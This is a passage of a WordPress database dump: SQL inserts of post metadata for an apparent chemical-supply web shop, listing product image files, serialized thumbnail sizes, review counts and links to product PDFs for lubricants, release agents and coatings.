INSERT INTO `wp_postmeta` VALUES (15037, 1436, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:6000;s:4:"file";s:26:"2016/09/krytox-pro-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"krytox-pro-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"krytox-pro-oil-800x800.jpg";s:5:"width";i:800;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"krytox-pro-oil-768x768.jpg";s:5:"width";i:768;s:6:"height";i:768;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"krytox-pro-oil-1600x1600.jpg";s:5:"width";i:1600;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"krytox-pro-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"krytox-pro-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"krytox-pro-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"krytox-pro-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15038, 1435, '_thumbnail_id', '1436'); 
INSERT INTO `wp_postmeta` VALUES (15039, 1435, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (15040, 1435, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (15041, 1437, '_wp_attached_file', '2016/08/Dental-Lubricant-instructions-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (15042, 1438, '_wp_attached_file', '2016/08/Dental-1.pdf'); 
INSERT INTO `wp_postmeta` VALUES (15043, 1065, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15044, 1181, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15045, 474, '318_custom_list_file', 'a:2:{s:32:"826bbb2defbc77f834533afb8474764f";a:3:{s:4:"name";s:30:"FluoroExtreme Dental Lubricant";s:4:"file";s:96:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Dental-Lubricant-instructions-1.pdf";s:4:"desc";s:34:"FluoroExtreme Dental Lubricant TDS";}s:32:"31b023b404389f216a916594a89c3201";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Dental-1.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (15050, 819, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (15051, 1441, '_wp_attached_file', '2016/09/hexion-heloxy-modifier-107.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15052, 1441, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/hexion-heloxy-modifier-107.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"hexion-heloxy-modifier-107-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-107-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15053, 1442, '_wp_attached_file', '2016/09/hexion-heloxy-modifier-116.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15054, 1442, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:38:"2016/09/hexion-heloxy-modifier-116.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"hexion-heloxy-modifier-116-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"hexion-heloxy-modifier-116-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15055, 1443, '_wp_attached_file', '2016/09/ms-143te-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15056, 1443, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-143te-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-143te-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-143te-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15057, 1444, '_wp_attached_file', '2016/09/ms-143xd-ptfe-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15058, 1444, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:39:"2016/09/ms-143xd-ptfe-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"ms-143xd-ptfe-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"ms-143xd-ptfe-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15059, 1445, '_wp_attached_file', '2016/09/ms-153bn-release-agent.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15060, 1445, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/09/ms-153bn-release-agent.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"ms-153bn-release-agent-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"ms-153bn-release-agent-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15061, 1446, '_wp_attached_file', '2016/09/ms-472c-urethane-conformal-coating.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15062, 1446, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:46:"2016/09/ms-472c-urethane-conformal-coating.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:48:"ms-472c-urethane-conformal-coating-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:46:"ms-472c-urethane-conformal-coating-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15063, 1447, '_wp_attached_file', '2016/09/releasys-8500-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15064, 1447, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:53:"2016/09/releasys-8500-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:55:"releasys-8500-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"releasys-8500-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15065, 1448, '_wp_attached_file', '2016/09/releasys-8800-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15066, 1448, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:53:"2016/09/releasys-8800-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:55:"releasys-8800-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"releasys-8800-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15067, 1449, '_wp_attached_file', '2016/09/releasys-8900-semi-permanent-mold-release.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15068, 1449, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:53:"2016/09/releasys-8900-semi-permanent-mold-release.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:55:"releasys-8900-semi-permanent-mold-release-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:53:"releasys-8900-semi-permanent-mold-release-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15069, 1450, '_wp_attached_file', '2016/09/teflon-heavy-equipment-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15070, 1450, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:41:"2016/09/teflon-heavy-equipment-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:41:"teflon-heavy-equipment-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (15071, 1451, '_wp_attached_file', '2016/09/teflon-heavy-equipment-grease-t.jpg'); 
INSERT INTO `wp_postmeta` VALUES (15072, 1451, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:43:"2016/09/teflon-heavy-equipment-grease-t.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:45:"teflon-heavy-equipment-grease-t-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-grease-t-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:43:"teflon-heavy-equipment-gr